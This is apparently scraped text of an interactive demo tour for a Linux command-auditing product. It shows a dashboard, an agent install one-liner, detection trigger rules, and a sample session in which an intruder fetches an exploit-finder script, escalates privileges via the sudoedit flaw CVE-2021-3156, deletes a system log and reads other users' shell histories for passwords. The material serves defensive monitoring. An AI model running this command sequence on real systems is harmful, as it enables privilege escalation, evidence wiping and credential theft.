``````````````````
Back Back
Interactive tour · Step 2 / 4
``````````````````
Go To App

Welcome back, John Doe

Top 5 user by alerts
Past Month
0
25
50
75
100
izabela.crowther
omari.akhtar
jayden.garrison
sama.boyce
harmony.whitehouse
Alerts by cities
New York City640
Washington, D.C298
Mountain View24
Council Bluffs1
24
1
938
Leaflet | © OpenStreetMap contributors
Servers by alert volume
Past Month
node-3.us-east-1.acme.com443
staging.us-east-2.acme.com382
production.us-east-1.acme.com113
staging.us-west-1.acme.com18
production.us-west-2.acme.com6
staging.us-central-1.acme.com1
Notices
Past Month
SOC2 - Generic Ownership/Permission Modification
403
SOC2 - Security Control Interaction
319
Sudo Exec Meme
116
SOC2 - Package Install/Removal
48
SOC2 - Listening Service State Change
13
SOC2 - Abnormal Service User Child Process
4
Alerts
Past Month
SOC2 - User Account Modification
27
Block action for Root
21
Kernel Runtime Modification
18
SOC2 - Cmd Audit Agent Probe Tampering
13
Cmd - SOC2 - Cmd Audit/Control Agent Disconnected Events Deletion
11
Cmd - SOC2 - Cmd Audit/Control Security Control Information Discovery
6
All Users by Session Count
Past Month
omari.akhtar475
elysia.winter471
izabela.crowther460
mehreen.stewart457
patsy.mackay456
shazia.leblanc456
kristy.douglas456
wojciech.larson454
harlow.jenkins452
leonidas.garrison451
dawood.norris450
sama.boyce448
whitney.ashley448
jayden.garrison448
nyle.humphrey447
ritik.scott446
drake.marin446
emmanuella.haney446
esha.campos440
kristen.chester440

#Install Cmd on your Linux hosts

Installing a Cmd agent on a single host is as simple as copying and pasting a one-line script.

~ Demo Linux machine terminal ~

michaels@test-machine:~$
Paste and
run the script
michaels@test-machine:~$ curl -s -f https://sub2.c‑app.cmd.com:443/install/50e2caff524ccc37ea91ecd9759d4e1fa5e746c272b489d7d2b68e7cf81a41d767335e774c7ed99cb09a14b094ebe629316fefe9d27358182522b1d9374e2684/PRJ-92LP/U2VydmVy/Staging | sudo bash
_ Starting Cmd installation
>_ Detected ubuntu
>_ Downloading Cmd
>_ Installing Cmd
(Reading database ... 87370 files and directories currently installed.)
Preparing to unpack /tmp/amd64.deb ...
Unpacking ccf (1.4.0) over (1.4.0) ...
Setting up ccf (1.4.0) ...
>_ Configuring Cmd
>_ Starting Cmd Agent
>_ Completed Cmd installation
michael@test-machine:~$

#Observing a privilege escalation vulnerability

Our web app's session view allows you to keep a close eye on any interaction with your servers, and helps highlight potential indicators of compromise.

Click to view
output
Expand alerts
block
Click to see
command details
bash started by omari.akhtar
/home/omari.akhtar $ whoami
/home/omari.akhtar $ id
/home/omari.akhtar $ sudo whoami
Exec user change: root
/home/omari.akhtar $ curl -s -f example.com/exploitfinder.sh
/home/omari.akhtar $ sudoedit -s /
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ...
stderr
/home/omari.akhtar $ dash /tmp/samedit.sh
/home/omari.akhtar $ sudo sh
Exec user change: root
/home/omari.akhtar $ dash
/home/omari.akhtar $ usermod -aG sudo omari.akhtar
SOC2 - User Account Modification
User account modification may introduce additional risk to a system or is a result of attacker behaviour. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Condition when command runs:
cmd_root IN 'adduser,addgroup,chsh,groupadd,groupmod,passwd,useradd,usermod' AND cmd_parameters NOT IN '*bin/nologin*,*bin/false*'
cmd_root IN 'adduser,addgroup,chsh,groupadd,groupmod,passwd,useradd,usermod' AND cmd_parameters NOT IN '*bin/nologin*,*bin/false*'
/home/omari.akhtar $ rm -fr /var/log/messages.log
/home/omari.akhtar $ tail -n 10
/home/omari.akhtar $ last
/home/omari.akhtar $ cat /etc/passwd
/home/omari.akhtar $ grep --color=auto emmanuel
/home/omari.akhtar $ last
/home/omari.akhtar $ grep --color=auto izabela
/home/omari.akhtar $ last
/home/omari.akhtar $ sudo su
Exec user change: root
/home/omari.akhtar $ su
/home/omari.akhtar $ bash
/home/omari.akhtar $ su emmanuella.haney
Exec user change: emmanuella.haney
/home/omari.akhtar $ bash
/home/omari.akhtar $ cd /home/emmanuella.haney/
/home/emmanuella.haney $ grep --color=auto ssh
/home/emmanuella.haney $ cat /home/emmanuella.haney/.bash_history
/home/emmanuella.haney $ sudo su -
Exec user change: root
/home/emmanuella.haney $ su -
/root $ bash
/root $ su izabela.crowther
Exec user change: izabela.crowther
/root $ bash
/root $ cd /home/izabela.crowther/
/home/izabela.crowther $ grep --color=auto password
/home/izabela.crowther $ cat /home/izabela.crowther/.bash_history
 Command details
Date:Feb 24, 2:36 AM (UTC)
Exec user:root
Executable path:/usr/sbin/usermod
Parent command:dash
Note:Add notes…
Process details
SID:22814
PID:22839
PPID:22838
PGID:22839
 Session details
PID:22814
Date connected:Feb 24, 2:36 AM (UTC)
Status:Session ended
User IP:35.225.224.99 (External)
Duration:00:01:28
Entry mechanism:ssh
Interactive:Yes
Cmd version1.4.9
Note:Add notes…
Environment variables
PATH = /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
 Alert details (1)
Command alerts (1)
Group:SOC2
Actions:
 Server details
Hostname:demo-node-3
OS:Linux demo-node-3 4.15.0-1077-gcp #87~16.04.1-Ubuntu SMP Sat… more
IPs[object Object]:127.0.0.1, 10.128.0.12
Date added:Apr 18, 2020, 11:07 PM (UTC)
Sessions:189,663
Commands:20,144,797
Alerts:414,114
Note:Add notes…
Feb 24, 2:36 AM (UTC)
bash
233
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Mar 18, 6:12 PM (UTC)
bash
86
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Mar 18, 6:11 PM (UTC)
bash
102
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Mar 18, 6:10 PM (UTC)
bash
96
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Mar 18, 6:09 PM (UTC)
bash
77
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Mar 18, 6:06 PM (UTC)
bash
105
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Mar 18, 6:05 PM (UTC)
bash
141
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Trigger activity
Past Week
Feb 16 Feb 18 Feb 20 Feb 23 0 50 100
Triggers by risk level
Past Week
1 - Low1
2 - Medium0
3 - High1
4 - Very high2
5 - Critical2

6

Top alerts
Past Week
SOC2 - Generic Ownership/Permission Modification
254
SOC2 - Security Control Interaction
49
Block action for Root
2
Triggers
Archived
12 Triggers       
Block action for Root
No description
Command
Feb 22, 11:06 PM (UTC)
Feb 22, 11:06 PM (UTC)
SOC2 - Security Control Interaction
Interaction with enabled security controls may impact the effectiveness the controls in place. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:34 PM (UTC)
Jan 15, 7:34 PM (UTC)
SOC2 - Package Install/Removal
Installation or removal of system or user isolated packages may reduce functionality or adversely modify the behaviour of the system. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:34 PM (UTC)
Jan 15, 7:34 PM (UTC)
SOC2 - Listening Service State Change
Manual state change of external or internal listening services may result in abnormal system behaviour or adversely impact service availability. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:33 PM (UTC)
Jan 15, 7:33 PM (UTC)
SOC2 - Abnormal Service User Child Process
During normal operation it is rare that listening services providing web or backend services launch shell child processes and occurrences warrant further investigation. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:32 PM (UTC)
Jan 15, 7:32 PM (UTC)
SOC2 - Generic Ownership/Permission Modification
File ownership or permission changes may impact the current configured DACL policies on a given instance. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1.
Command
SOC2
Jan 15, 7:32 PM (UTC)
Jan 15, 7:32 PM (UTC)
SOC2 - Suspicious Ownership/Permission Modification
Abnormal ownership or permissions may render sensitive information on a system accessible to parties that should not have access or may be the result of attacker behaviour for introducing mechanisms useful for privilege escalation in subsequent sessions. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:31 PM (UTC)
Jan 15, 7:31 PM (UTC)
SOC2 - User Account Modification
User account modification may introduce additional risk to a system or is a result of attacker behaviour. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:48 PM (UTC)
Jan 15, 7:30 PM (UTC)
SOC2 - Kernel Runtime Modification
Loading or unloading kernel modules may adversely impact the security or availability of the current running system. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:48 PM (UTC)
Jan 15, 7:26 PM (UTC)
SOC2 - Cmd Audit Agent Probe Tampering
Modification of downloaded probes could cut off visibility for the Cmd Audit product. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1.
Command
SOC2
Jan 15, 7:42 PM (UTC)
Jan 15, 7:24 PM (UTC)
Cmd - SOC2 - Cmd Audit/Control Agent Disconnected Events Deletion
Deletion of the offline events database can prevent visibility into events observed during instances of network connectivity issues. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1.
Command
SOC2
Jan 15, 7:42 PM (UTC)
Jan 15, 7:22 PM (UTC)
Cmd - SOC2 - Cmd Audit/Control Security Control Information Discovery
Discovery of installed observability software or internal cryptographic keys may indicate preparation for evasion attempts. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1.
Command
SOC2
Jan 15, 7:42 PM (UTC)
Jan 15, 7:22 PM (UTC)
Add trigger
query

My first test trigger

My first test trigger to see how Cmd alerts and notifications work...

Conditions

cmd_root = 'sudoedit' AND cmd_parameters = '*-s'
cmd_root = 'sudoedit' AND cmd_parameters = '*-s'

When: Command run

When all of the following is true
and
sudoedit
and
*-s

Actions

Set alert
All triggers include an action to create an alert. Alerts set above level zero will need to be resolved.
Send Slack alert
Select Slack integration
Add action
Terminal Slack
Confirm email

Confirm your email to continue.

We’ve sent the verification email to .

Request Private Demo

Schedule a 1:1 session with our team

More things you can do with Cmd

# Realtime data scrubbing

Protect your IP by scrubbing data before it leaves your servers.

# Reports

Visualize your data; discover and share key insights about how your infrastructure is used.

# Data export

Export data to your buckets for archiving, or integrate directly with SIEM apps.

# View live sessions in real-time

See what happens on your systems, from bare metal to the cloud.

Thumbs up
Confirm email

Please confirm your email address

We’ve sent the verification email to .

10
20
30
40
50
0
0
8:00am
12:00pm
4:00pm
8:00pm
12:00am
4:00am
Wednesday Feb 3
8:00am
12:00pm
4:00pm
8:00pm
12:00am
Thursday Feb 4
4:00am
8:00am
12:00pm
4:00pm
8:00pm
12:00am
Friday Feb 5
4:00am
8:00am
12:00pm
4:00pm
8:00pm
12:00am
Saturday Feb 6
4:00am
8:00am
12:00pm
4:00pm
8:00pm
12:00am
Sunday Feb 7
4:00am
8:00am
12:00pm
Tuesday Feb 2
Feb 7, 1:26 PM (UTC)
bash
71
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:25 PM (UTC)
bash
86
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:23 PM (UTC)
bash
85
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:22 PM (UTC)
bash
165
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:21 PM (UTC)
bash
112
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:20 PM (UTC)
bash
106
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:19 PM (UTC)
bash
102
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:16 PM (UTC)
bash
149
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:15 PM (UTC)
bash
97
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:11 PM (UTC)
bash
151
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:09 PM (UTC)
bash
71
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:08 PM (UTC)
bash
79
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:07 PM (UTC)
bash
112
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:06 PM (UTC)
bash
166
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:04 PM (UTC)
bash
105
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:03 PM (UTC)
bash
117
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:02 PM (UTC)
bash
101
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 1:01 PM (UTC)
bash
103
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:59 PM (UTC)
bash
78
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:58 PM (UTC)
bash
105
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:56 PM (UTC)
bash
109
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:55 PM (UTC)
bash
87
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:54 PM (UTC)
bash
104
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:52 PM (UTC)
bash
103
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:50 PM (UTC)
bash
91
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:48 PM (UTC)
bash
111
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:46 PM (UTC)
bash
136
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:42 PM (UTC)
bash
108
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:41 PM (UTC)
bash
77
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:39 PM (UTC)
bash
80
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:37 PM (UTC)
bash
76
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:36 PM (UTC)
bash
101
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:31 PM (UTC)
bash
167
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:30 PM (UTC)
bash
71
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:28 PM (UTC)
bash
107
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:27 PM (UTC)
bash
103
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:26 PM (UTC)
bash
102
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:22 PM (UTC)
bash
72
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:21 PM (UTC)
bash
112
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:19 PM (UTC)
bash
109
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:17 PM (UTC)
bash
73
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:16 PM (UTC)
bash
81
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:15 PM (UTC)
bash
157
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:12 PM (UTC)
bash
84
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:09 PM (UTC)
bash
71
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:08 PM (UTC)
bash
97
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:07 PM (UTC)
bash
82
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:03 PM (UTC)
bash
106
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 12:01 PM (UTC)
bash
104
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:59 AM (UTC)
bash
152
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:58 AM (UTC)
bash
87
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:57 AM (UTC)
bash
115
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:56 AM (UTC)
bash
168
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:55 AM (UTC)
bash
111
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:53 AM (UTC)
bash
103
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:51 AM (UTC)
bash
79
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:50 AM (UTC)
bash
75
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:49 AM (UTC)
bash
148
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:47 AM (UTC)
bash
107
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:45 AM (UTC)
bash
109
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:44 AM (UTC)
bash
110
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:43 AM (UTC)
bash
101
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:41 AM (UTC)
bash
102
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:40 AM (UTC)
bash
105
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:37 AM (UTC)
bash
110
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:36 AM (UTC)
bash
108
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:35 AM (UTC)
bash
91
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:33 AM (UTC)
bash
85
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:29 AM (UTC)
bash
99
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:26 AM (UTC)
bash
102
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:25 AM (UTC)
bash
87
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:24 AM (UTC)
bash
104
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:23 AM (UTC)
bash
166
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:22 AM (UTC)
bash
106
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:20 AM (UTC)
bash
102
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:19 AM (UTC)
bash
159
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:18 AM (UTC)
bash
111
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:17 AM (UTC)
bash
103
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:15 AM (UTC)
bash
99
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:14 AM (UTC)
bash
101
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:07 AM (UTC)
bash
106
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:04 AM (UTC)
bash
102
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 11:01 AM (UTC)
bash
82
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:59 AM (UTC)
bash
99
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:55 AM (UTC)
bash
151
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:54 AM (UTC)
bash
140
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:53 AM (UTC)
bash
113
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:51 AM (UTC)
bash
103
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:50 AM (UTC)
bash
113
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:44 AM (UTC)
bash
95
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:43 AM (UTC)
bash
105
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:42 AM (UTC)
bash
71
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:41 AM (UTC)
bash
111
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:40 AM (UTC)
bash
90
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:39 AM (UTC)
bash
104
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:38 AM (UTC)
bash
101
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:36 AM (UTC)
bash
110
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:34 AM (UTC)
bash
108
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:33 AM (UTC)
bash
102
0
/usr/local/sbin:/usr/local/bin:/usr/sbin...
Feb 7, 10:32 AM (UTC)
bash
106
1
/usr/local/sbin:/usr/local/bin:/usr/sbin...
@Bashee from Cmd

Welcome to Cmd Quick Tour!

In this quick tour we'll show you around Cmd and explain how everything works.

Start Tour
>_>
<_<
*_*
^_^
@Bashee from Cmd

# Cmd Terminal 2.0

It all starts with the agent installer.

Installing Cmd is a simple process. Unlike other system tracing and monitoring tools, Cmd doesn't require complex configuration.

You can manually install or orchestrate the deployment using Chef, Puppet, Ansible or any other configuration management application.

The collected data is presented in sessions view for quick and easy auditing of all executed commands.

Our Linux-based data model helps to contextualize each command and process in simple and intuitive ways.

Let's see how it works in this typical priv-esc from a shell that leverages Varon Samedit
(CVE-2021-3156).

See the same session in: AuditD or Linux Shell

Create custom triggers with dozens of properties related to the process, session, and command.

Let's create a trigger to notify when engineers use sudoedit command.

Click the green circles to navigate
Cmd Agent Installed
Take the agent for a spin
Session
Explore Triggers
Continue
@Bashee from Cmd

Cmd starts collecting key data once the agent is installed. We focus on capturing the things that matter:

  • # Interactive sessions
  • # New processes
  • # File changes
  • # And more...
See A session
*_*
@Bashee from Cmd

Cmd provides a complete library of default triggers to help detect and prevent exploits and bad behavior on your system.

But every environment is different, so you can create a custom trigger that fits your specific needs.

Create A Custom trigger
^_^